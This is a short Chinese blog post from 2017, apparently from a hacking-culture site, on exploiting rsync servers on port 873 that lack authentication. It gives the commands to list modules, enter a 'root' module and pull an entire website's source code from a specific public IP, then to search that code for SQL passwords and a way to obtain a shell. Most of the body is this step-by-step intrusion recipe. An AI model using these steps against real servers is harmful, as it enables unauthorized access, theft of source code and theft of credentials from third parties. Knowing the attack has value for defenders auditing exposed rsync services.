记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

rsync(873端口)漏洞

2017-02-03 06:10

先看看nmap扫描的端口吧

rsync(873端口)漏洞-Web安全

其中837端口就是rsync服务

rsync ip::                               //列出当前目录

rsync(873端口)漏洞-Web安全

这里显示的是root,就证明有戏了

 

rsync ip::root/                          //进入root目录

rsync(873端口)漏洞-Web安全

ps:最好是找到网站的路径(比如报错啊,什么的),这样getshell就方便一些。

当然如果实在找不到了,那就在这些文件里面一个一个找吧

 

找到路径后

rsync -avz 121.88.5.142::ROOT/目录 /root/本机目录                 //下载网站全部源码到本地

 

下载后,就是进行简易的代码审计。可以查找sql密码,或者本地审计漏洞。

知识来源: www.0-sec.org/2017/02/02/rsync%ef%bc%88873%e7%ab%af%e5%8f%a3%ef%bc%89%e6%bc%8f%e6%b4%9e/

阅读:194430 | 评论:0 | 标签:安全文章 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“rsync(873端口)漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云